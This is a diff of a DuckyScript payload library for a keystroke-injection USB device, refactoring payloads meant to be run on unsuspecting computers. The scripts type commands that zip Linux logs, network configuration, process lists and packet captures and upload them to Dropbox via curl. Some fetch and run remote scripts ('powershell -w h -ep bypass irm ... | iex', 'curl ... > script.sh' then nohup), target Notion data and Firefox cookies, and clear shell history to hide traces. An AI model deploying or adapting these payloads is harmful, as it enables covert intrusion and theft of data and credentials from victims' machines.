REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE #APP_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Windows research
DELAY 2000
GUI
DELAY 1000
REM Search and opern explorer app
STRING explorer
ENTER
STRINGLN explorer
DELAY 1000
REM Goto search bar and open "Uninstall or change a program" page

22
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
View File

@ -1,18 +1,18 @@
REM ########################################################
REM # #
REM # Title : Dump Windows Memory Through ProcDump #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Exfiltration #
REM # Target : Windows #
REM # #
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Dump Windows Memory Through ProcDump #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows #
# #
########################################################
END_REM
REM Requirements:
REM - Authorization to execute powershell commands
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a

64
payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
View File

@ -1,13 +1,12 @@
REM ###################################################
REM # |
REM # Title : Exfiltrate Computer Screenshots |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltrate |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################
###################################################
# #
# Title : Exfiltrate Computer Screenshots #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltrate #
# Target : Windows 10-11 #
# #
###################################################
REM Requirements:
REM - Internet Connection
@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DELAY 1000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING powershell

4
payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
View File

@ -1,11 +1,9 @@
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
# Exfiltrate Linux Content With Dropbox
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take folder content on Linux Systems.

4
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
View File

@ -1,12 +1,10 @@
# Exfiltrate Linux Log Files - BADUSB ✅
# Exfiltrate Linux Log Files
A script used to take linux logs.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take linux logs.

99
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
View File

@ -1,80 +1,93 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ######################################################
REM_BLOCK
######################################################
# #
# Title : Exfiltrate Linux Logs With Dropbox #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration, Execution #
# Target : Linux #
# #
######################################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DEFINE #TOKEN example
REM Send to Dropbox function
DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
STRINGLN USER_NAME=$(whoami)
REM Create random num
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
REM Zip path
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
REM Default log path
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER
STRINGLN LOG_PATH="/var/log/"
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
REM Send to Dropbox function
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_LINK
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
REM Send timing - it depends
DELAY 5000
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
STRINGLN rm -rf "$TMP_FOLDER_PATH"

2
payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
View File

@ -1,5 +1,5 @@
# Exfiltrate Network Configuration - Linux
# Exfiltrate Network Configuration - Linux
A script used to exfiltrate the network configuration on a Linux machine.

125
payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
View File

@ -1,96 +1,101 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM_BLOCK
##########################################################
# #
# Title : Exfiltrate Linux Network Configuration #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration, Execution #
# Target : Linux #
# #
##########################################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DEFINE #TOKEN example
REM DELAY 500
REM STRING USER_NAME=$(whoami)
REM ENTER
REM Set yout Dropbox folder name
DEFINE #DROPBOX_FOLDER_NAME example
REM This is just a Dropbox const, don't edit
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
STRINGLN USER_NAME=$(whoami)
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
DELAY 500
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
ENTER
STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
ENTER
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
DELAY 500
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
ENTER
STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
DELAY 1000
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
ENTER
STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
DELAY 1000
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
ENTER
STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
ENTER
STRING DROPBOX_FOLDER_NAME
ENTER
STRING "
ENTER
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
DELAY 2000
STRING history -c
ENTER
STRINGLN history -c
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
STRINGLN rm -rf "$TMP_FOLDER_PATH"
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER
STRINGLN rm -rf "$ZIP_PATH"; exit

95
payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
View File

@ -1,57 +1,76 @@
REM #############################################
REM # |
REM # Title : Exfiltrate Network Traffic |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #############################################
REM_BLOCK
#############################################
# #
# Title : Exfiltrate Network Traffic #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Linux #
# #
#############################################
END_REM
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
DEFINE #SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80
DEFINE SNIFFING example
DEFINE #SNIFFING example
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example
DEFINE #TOKEN example
REM Just a Dropbox const
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap
DEFINE #FILE example.pcap
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRINGLN sudo su
DELAY 1000
STRINGLN SUDO_PASS
STRINGLN #SUDO_PASS
DELAY 1000
REM #### Network Traffic SECTION ####
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
STRINGLN FILE_PATH="#FILE"
DELAY 500
STRING filter_expression="
STRING SNIFFING
STRING "
ENTER
STRINGLN filter_expression="#SNIFFING"
DELAY 500
REM Network card name
@ -71,28 +90,18 @@ DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER
STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
REM #### REMOVE TRACES ####
STRINGLN rm "$FILE_PATH"
DELAY 500

79
payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
View File

@ -1,13 +1,14 @@
REM ##################################################
REM # |
REM # Title : Exfiltrate Photos Through Shell |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##################################################
REM_BLOCK
##################################################
# #
# Title : Exfiltrate Photos Through Shell #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Linux #
# #
##################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com
DEFINE #SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example
DEFINE #SUDO-PSWD example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Permission ####
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
STRING sudo su
ENTER
STRINGLN sudo su
DELAY 500
STRING SUDO-PSWD
ENTER
STRINGLN #SUDO-PSWD
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
REM STRING apt install fswebcam -y
REM ENTER
REM STRINGLN apt install fswebcam -y
REM DELAY Based On Internet Power
REM DELAY 5000
REM #### Script ####
STRING curl
STRING SCRIPT-SH-LINK
STRING > script.sh
ENTER
STRINGLN curl #SCRIPT-SH-LINK > script.sh
REM DELAY Based On Internet Power
DELAY 4000
STRING chmod +x script.sh
ENTER
STRINGLN chmod +x script.sh
DELAY 500
STRING nohup ./script.sh > /dev/null 2>&1 & exit
ENTER
STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit

98
payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
View File

@ -1,73 +1,79 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################
REM_BLOCK
##########################################
# #
# Title : Exfiltrate Process Info #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Linux #
# #
##########################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
REM Set yout Dropbox folder name
DEFINE #DROPBOX_FOLDER_NAME example
REM This is just a Dropbox const, don't edit
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
REM #### GET PROCESS SECTION ####
STRING ps aux > process.txt
ENTER
STRINGLN ps aux > process.txt
DELAY 500
REM #### EXFILTRATE SECTION ####
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
STRINGLN USER_NAME=$(whoami)
DELAY 500
STRING TXT_PATH="/home/$USER_NAME/process.txt"
ENTER
STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
DELAY 500
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
STRING DROPBOX_FOLDER_NAME
STRING "
ENTER
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
ENTER
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
STRING exit
ENTER
STRINGLN history -c; exit

70
payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
View File

@ -1,26 +1,66 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ##########################################
REM_BLOCK
##########################################
# #
# Title : Exfiltrate Process Info #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
##########################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
DEFINE PAYLOAD example.com
DEFINE #PAYLOAD example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass irm
STRING PAYLOAD
STRING | iex
ENTER
STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex

10
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
View File

@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>
</div>
</div>

68
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
View File

@ -1,26 +1,68 @@
REM #########################################################################
REM # |
REM # Title : Exfiltrates the entire database of the Notion client |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM #########################################################################
REM_BLOCK
#########################################################################
# #
# Title : Exfiltrates the entire database of the Notion client #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
#########################################################################
END_REM
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING PowerShell
ENTER
STRINGLN PowerShell
DELAY 2000
REM Settings about Notion DB

80
payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
View File

@ -1,31 +1,69 @@
REM ####################################################
REM # |
REM # Title : Export Firefox Cookies Database |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################
REM_BLOCK
####################################################
# #
# Title : Export Firefox Cookies Database #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
####################################################
END_REM
REM Requirements:
REM - Firefox must be installed
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
DEFINE DROPBOX_ACCESS_TOKEN "example"
DEFINE #DROPBOX_ACCESS_TOKEN "example"
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
